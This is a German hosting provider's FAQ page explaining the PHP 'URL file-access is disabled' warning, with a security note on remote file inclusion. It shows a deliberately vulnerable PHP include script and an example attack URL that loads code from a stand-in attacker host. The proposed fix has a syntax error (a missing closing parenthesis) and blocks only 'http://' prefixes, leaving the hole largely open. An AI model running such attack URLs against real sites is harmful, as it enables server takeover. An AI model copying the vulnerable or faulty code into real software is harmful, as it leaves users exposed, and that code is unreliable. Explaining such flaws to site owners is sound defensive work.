hosting menu left
hosting menu right

top of hosting header
hosting servers box banner web hosting logo
hosting plan ico 1 Standard Paket
  • Speicherplatz 1 GB
  • Tranfervolumen 50 GB
  • inkl. 1 .de domain
  • POP3 E-Mail-Accounts 100
  • Setup Gebühr Euro 0.00
  • Monatlich nur Euro 3,99
hosting plan ico 2 sorglos Paket
  • Domain 1 .de Domain
  • Monatlicher Traffic 50 GB
  • inkl. Ranking Topper Seite
  • inkl. WordPress Blog
  • inkl.joomla oder xt commerce
  • Monatlich nur Euro 3,99 /+ einmalig Euro 298,00
hosting plan ico 3 Marketer Hosting
  • Speicherplatz 1 GB
  • Tranvervolumen 50 GB
  • DNS Weiterleitung auf Webspace möglich
  • My SQL Datenbanken 3
  • Setup Gebühr Euro 0.00
  • Monatlich nur Euro 5.99


bottom of hosting header
website hosting main area top

Whois Suche


Ihre Wunschdomain
Domain: 

Formulare

Hilfe/FAQ

Start Kategorien PHP5 Was bedeutet: "Warning: fopen(): URL file-access is disabled in the server configuration" ?

Lesezeichen Erstelle PDF Email Drucken

Was bedeutet: "Warning: fopen(): URL file-access is disabled in the server configuration" ?

Aufrufe:
1106
Lesezeichen:
0 Lesezeichen anlegen

Antwort

Das Programm versucht einen URL (bspw. einen http- oder ftp-Link) als Datei zu öffnen. Aus Sicherheitsgründen ist diese Möglichkeit auf unseren...

Das Programm versucht einen URL (bspw. einen http- oder ftp-Link) als Datei zu öffnen. Aus Sicherheitsgründen ist diese Möglichkeit auf unseren Server im Standard deaktiviert.
Wir können Ihnen diese Einstellung natürlich ändern. Schreiben Sie uns dazu einfach an support@speicherhosting.com unter Angabe Ihres Account- (bspw. web123) und des Domainnnamen.

Hinweis zur Sicherheit und möglichen Gefahren:

Achtung: Diese Einstellung ist sicherheitsrelevant. Achten Sie immer auf die Aktualität Ihrer Software. Bei selbstgeschriebener Software achten Sie darauf, dass es nicht möglich ist, beliebige Dateinamen einzuschleusen. Ein Beispiel:
Sie haben ein einfaches php-Skript geschrieben, welches die Seiten anhand der Variable site per include lädt. Der Quelltext könnte ungefähr so aussehen:

<html>
<head><title>Meine Seite</title></head>
<body>
<a href="/kategorien?site=Kartoffeln">Kartoffeln</a>
<a href="/kategorien?site=Bohnen">Bohnen</a>
<?php
   $site=$_GET['site'];      // dies ist bei register_globals on natürlich nicht nötig
   include($site);
?>
</body>


Dieses Skript fügt also Dateien ein, deren Namen im URL übergeben wurden. Es hindert einen Angreifer aber niemand daran nun auch folgenden URL aufzurufen: http://www.ihredomain.de/index.php?site=http://www.angreifer.de/phpskript.txt.
Der Server wird nun den PHP-Code in der Textdatei ausführen, und der Angreifer kann nun weitere Programme installieren. Sie sollten also Ihr Skript darauf trimmen, derartige Dateinamen nicht zu akzeptieren. Dies könnte bspw. so aussehen:

<html>
<head><title>Meine Seite</title></head>
<body>
<a href="/kategorien?site=Kartoffeln">Kartoffeln</a>
<a href="/kategorien?site=Bohnen">Bohnen</a>
<?php
   $site=$_GET['site'];      // dies ist bei register_globals on natürlich nicht nötig
   if(preg_match("/^http:\/\//",$site) // ^ bedeutet Anfang der Zeichenkette
           die("Bitte nicht hacken"); // Skript beenden
   include($site);
?>
</body>


Das Skript prüft nun also, ob die Eingabevariable site mit http:// beginnt (es handelt sich dabei um einen regulären Ausdruck). Ist dem so, wird das Skript umgehend beendet. Hier müsste eigentlich noch ein zweiter Test auf ftp:// durchgeführt werden.

Kategorie

PHP5

Search

Werbung

Empfohlene Links:



website hosting main area bottom

Powered by Joomla!. Designed by: hosting php 4 hosting Valid XHTML and CSS.